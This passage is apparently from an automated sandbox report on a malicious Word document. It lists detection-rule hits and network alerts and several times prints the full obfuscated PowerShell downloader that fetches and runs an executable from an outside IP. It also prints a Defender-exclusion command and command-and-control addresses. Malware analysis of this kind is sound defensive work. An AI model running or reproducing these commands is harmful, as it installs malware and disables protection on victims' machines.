AgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 2092, ProcessName: wininit.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", ProcessId: 1908, ProcessName: csc.exe
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\caspol[1].exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 2092, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 2164, ProcessName: powershell.exe
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Initiated: true, ProcessId: 3292, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3292, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", CommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgI
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3292, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Local\Temp\ks3ogfke.stg.ps1
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wininit.exe, NewProcessName: C:\Users\user\AppData\Roaming\wininit.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wininit.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 2092, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 772, ProcessName: wininit.exe

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline", ProcessId: 1908, ProcessName: csc.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:16.946091+010020241971A Network Trojan was detected66.63.187.23180192.168.2.2249169TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:16.946086+010020244491Attempted User Privilege Gain192.168.2.224916966.63.187.23180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:25.038949+010020220501A Network Trojan was detected66.63.187.23180192.168.2.2249170TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:25.324376+010020220511A Network Trojan was detected66.63.187.23180192.168.2.2249170TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:34.825229+010020243121A Network Trojan was detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T10:11:35.689000+010020243121A Network Trojan was detected192.168.2.224917294.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:34.232361+010020253811Malware Command and Control Activity Detected192.168.2.224917194.156.177.4180TCP
                2024-11-20T10:11:34.936986+010020253811Malware Command and Control Activity Detected192.168.2.224917294.156.177.4180TCP
                2024-11-20T10:11:35.753276+010020253811Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T10:11:36.788420+010020253811Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T10:11:37.865230+010020253811Malware Command and Control Activity Detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T10:11:39.935431+010020253811Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T10:11:40.804853+010020253811Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T10:11:41.692875+010020253811Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T10:11:42.598311+010020253811Malware Command and Control Activity Detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T10:11:43.508451+010020253811Malware Command and Control Activity Detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T10:11:44.410226+010020253811Malware Command and Control Activity Detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T10:11:46.066976+010020253811Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T10:11:47.094306+010020253811Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T10:11:48.001931+010020253811Malware Command and Control Activity Detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T10:11:48.916450+010020253811Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T10:11:49.934221+010020253811Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T10:11:50.825355+010020253811Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T10:11:51.974265+010020253811Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T10:11:52.833476+010020253811Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T10:11:53.743942+010020253811Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T10:11:54.665755+010020253811Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T10:11:55.543705+010020253811Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T10:11:56.465409+010020253811Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T10:11:57.354850+010020253811Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T10:11:58.251851+010020253811Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T10:11:59.153133+010020253811Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T10:12:00.062553+010020253811Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T10:12:01.086240+010020253811Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T10:12:02.135572+010020253811Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T10:12:03.154171+010020253811Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T10:12:04.183469+010020253811Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T10:12:05.221730+010020253811Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T10:12:06.101870+010020253811Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T10:12:06.992362+010020253811Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T10:12:07.878233+010020253811Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T10:12:08.762365+010020253811Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T10:12:09.636983+010020253811Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T10:12:10.655009+010020253811Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T10:12:11.548573+010020253811Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T10:12:12.583479+010020253811Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T10:12:13.635352+010020253811Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T10:12:14.668490+010020253811Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T10:12:15.692786+010020253811Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T10:12:16.709953+010020253811Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T10:12:17.740346+010020253811Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T10:12:19.475029+010020253811Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T10:12:20.388739+010020253811Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T10:12:21.265845+010020253811Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T10:12:22.394589+010020253811Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T10:12:23.419939+010020253811Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T10:12:24.307414+010020253811Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T10:12:25.356968+010020253811Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T10:12:26.273860+010020253811Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T10:12:27.165072+010020253811Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T10:12:28.110543+010020253811Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T10:12:28.999728+010020253811Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T10:12:29.966426+010020253811Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T10:12:30.982470+010020253811Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T10:12:32.023731+010020253811Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T10:12:32.972572+010020253811Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T10:12:33.892076+010020253811Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T10:12:34.777104+010020253811Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T10:12:35.645216+010020253811Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T10:12:36.520686+010020253811Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T10:12:37.391332+010020253811Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T10:12:38.295670+010020253811Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T10:12:39.189869+010020253811Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T10:12:40.238221+010020253811Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T10:12:41.149834+010020253811Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T10:12:42.075089+010020253811Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T10:12:43.090775+010020253811Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T10:12:44.335023+010020253811Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T10:12:45.306056+010020253811Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T10:12:46.228751+010020253811Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T10:12:47.301018+010020253811Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T10:12:48.198489+010020253811Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T10:12:49.104815+010020253811Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T10:12:50.259999+010020253811Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T10:12:51.135098+010020253811Malware Command and Control Activity Detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T10:12:52.064243+010020253811Malware Command and Control Activity Detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T10:12:53.190103+010020253811Malware Command and Control Activity Detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T10:12:54.198386+010020253811Malware Command and Control Activity Detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T10:12:55.205372+010020253811Malware Command and Control Activity Detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T10:12:56.120814+010020253811Malware Command and Control Activity Detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T10:12:57.001731+010020253811Malware Command and Control Activity Detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T10:12:57.910682+010020253811Malware Command and Control Activity Detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T10:12:58.994068+010020253811Malware Command and Control Activity Detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T10:12:59.856695+010020253811Malware Command and Control Activity Detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T10:13:00.859620+010020253811Malware Command and Control Activity Detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T10:13:01.807106+010020253811Malware Command and Control Activity Detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T10:13:02.864990+010020253811Malware Command and Control Activity Detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T10:13:03.882271+010020253811Malware Command and Control Activity Detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T10:13:04.788703+010020253811Malware Command and Control Activity Detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T10:13:05.710359+010020253811Malware Command and Control Activity Detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T10:13:06.715979+010020253811Malware Command and Control Activity Detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T10:13:07.728341+010020253811Malware Command and Control Activity Detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T10:13:08.595686+010020253811Malware Command and Control Activity Detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T10:13:09.484579+010020253811Malware Command and Control Activity Detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T10:13:10.364041+010020253811Malware Command and Control Activity Detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T10:13:11.382963+010020253811Malware Command and Control Activity Detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T10:13:12.272453+010020253811Malware Command and Control Activity Detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T10:13:13.292586+010020253811Malware Command and Control Activity Detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T10:13:14.191871+010020253811Malware Command and Control Activity Detected192.168.2.224927394.156.177.4180TCP
                2024-11-20T10:13:15.065941+010020253811Malware Command and Control Activity Detected192.168.2.224927494.156.177.4180TCP
                2024-11-20T10:13:16.079240+010020253811Malware Command and Control Activity Detected192.168.2.224927594.156.177.4180TCP
                2024-11-20T10:13:17.017320+010020253811Malware Command and Control Activity Detected192.168.2.224927694.156.177.4180TCP
                2024-11-20T10:13:18.056702+010020253811Malware Command and Control Activity Detected192.168.2.224927794.156.177.4180TCP
                2024-11-20T10:13:18.985728+010020253811Malware Command and Control Activity Detected192.168.2.224927894.156.177.4180TCP
                2024-11-20T10:13:20.030600+010020253811Malware Command and Control Activity Detected192.168.2.224927994.156.177.4180TCP
                2024-11-20T10:13:21.135705+010020253811Malware Command and Control Activity Detected192.168.2.224928094.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:36.644739+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249173TCP
                2024-11-20T10:11:37.690894+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249174TCP
